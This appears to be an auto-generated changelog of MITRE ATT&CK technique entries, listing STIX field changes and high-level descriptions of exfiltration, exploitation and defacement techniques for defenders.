| Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network | Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 00:35:24.570000+00:00 | 2022-03-08 21:02:16.115000+00:00 |
| description | Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network | Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | File: File Access |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Command: Command Execution |
| x_mitre_data_sources[3] | File: File Access | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[4] | Command: Command Execution | Network Traffic: Network Traffic Flow |
| Description |
|---|
| Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 22:49:28.421000+00:00 | 2022-04-12 19:57:45.277000+00:00 |
| name | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration Over Unencrypted Non-C2 Protocol |
| x_mitre_data_sources[0] | Network Traffic: Network Connection Creation | File: File Access |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Command: Command Execution |
| x_mitre_data_sources[3] | File: File Access | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[4] | Command: Command Execution | Network Traffic: Network Connection Creation |
| x_mitre_version | 1.1 | 2.0 |
| Description |
|---|
| Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services. Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 22:50:29.607000+00:00 | 2022-10-19 21:28:34.699000+00:00 |
| x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Description |
|---|
| Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet. Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 01:02:24.172000+00:00 | 2022-08-30 12:49:02.969000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_data_sources[2] | File: File Access | File: File Access |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Connection Creation |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) | Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-20 21:51:45.776000+00:00 | 2022-04-19 17:06:53.032000+00:00 |
| description | Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) | Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) |
| external_references[1]['source_name'] | NVD CVE-2016-6662 | CWE top 25 |
| external_references[1]['description'] | National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018. | Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019. |
| external_references[1]['url'] | https://nvd.nist.gov/vuln/detail/CVE-2016-6662 | https://cwe.mitre.org/top25/index.html |
| external_references[3]['source_name'] | US-CERT TA18-106A Network Infrastructure Devices 2018 | NVD CVE-2016-6662 |
| external_references[3]['description'] | US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. | National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018. |
| external_references[3]['url'] | https://us-cert.cisa.gov/ncas/alerts/TA18-106A | https://nvd.nist.gov/vuln/detail/CVE-2016-6662 |
| external_references[4]['source_name'] | Cisco Blog Legacy Device Attacks | NVD CVE-2014-7169 |
| external_references[4]['description'] | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. | National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018. |
| external_references[4]['url'] | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 | https://nvd.nist.gov/vuln/detail/CVE-2014-7169 |
| external_references[5]['source_name'] | NVD CVE-2014-7169 | Cisco Blog Legacy Device Attacks |
| external_references[5]['description'] | National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018. | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. |
| external_references[5]['url'] | https://nvd.nist.gov/vuln/detail/CVE-2014-7169 | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 |
| external_references[7]['source_name'] | CWE top 25 | US-CERT TA18-106A Network Infrastructure Devices 2018 |
| external_references[7]['description'] | Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019. | US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| external_references[7]['url'] | https://cwe.mitre.org/top25/index.html | https://us-cert.cisa.gov/ncas/alerts/TA18-106A |
| Description |
|---|
| Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility. Several types exist: ### Browser-based Exploitation Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed. ### Office Applications Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run. ### Common Third-party Applications Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Process: Process Creation', 'Application Log: Application Log Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 19:01:34.932000+00:00 | 2022-04-18 18:48:06.141000+00:00 |
| x_mitre_version | 1.2 | 1.4 |
| Description |
|---|
| Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Application Log: Application Log Content', 'User Account: User Account Authentication', 'Process: Process Creation'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 18:51:01.070000+00:00 | 2022-04-28 16:06:49.447000+00:00 |
| external_references[1]['source_name'] | Technet MS14-068 | ADSecurity Detecting Forged Tickets |
| external_references[1]['description'] | Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015. | Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/library/security/ms14-068.aspx | https://adsecurity.org/?p=1515 |
| external_references[2]['source_name'] | ADSecurity Detecting Forged Tickets | Technet MS14-068 |
| external_references[2]['description'] | Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015. | Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015. |
| external_references[2]['url'] | https://adsecurity.org/?p=1515 | https://technet.microsoft.com/en-us/library/security/ms14-068.aspx |
| x_mitre_version | 1.1 | 1.4 |
| Description |
|---|
| Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them. Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Process: Process Creation', 'Application Log: Application Log Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 20:00:46.900000+00:00 | 2022-04-28 16:10:16.632000+00:00 |
| x_mitre_version | 1.1 | 1.3 |
| Description |
|---|
| Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570). |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 16:13:34.896000+00:00 | 2022-06-16 19:25:12.835000+00:00 |
| external_references[2]['source_name'] | Unit42 AcidBox June 2020 | Microsoft Driver Block Rules |
| external_references[2]['description'] | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. | Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021. |
| external_references[2]['url'] | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ | https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules |
| external_references[3]['source_name'] | Microsoft Driver Block Rules | Unit42 AcidBox June 2020 |
| external_references[3]['description'] | Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021. | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ |
| x_mitre_version | 1.3 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | David Tayouri | |
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 20:23:01.478000+00:00 | 2022-02-24 15:06:46.006000+00:00 |
| description | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. | Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. |
| x_mitre_detection | Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system. | Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of [Discovery](https://attack.mitre.org/tactics/TA0007), or other unusual network traffic that may indicate additional tools transferred to the system. |
| Old Description | New Description |
|---|---|
| An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) | An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.745000+00:00 | 2022-03-25 19:34:37.539000+00:00 |
| description | An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) | An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) |
| x_mitre_data_sources[0] | File: File Modification | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Application Log: Application Log Content | File: File Modification |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Application Log: Application Log Content |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
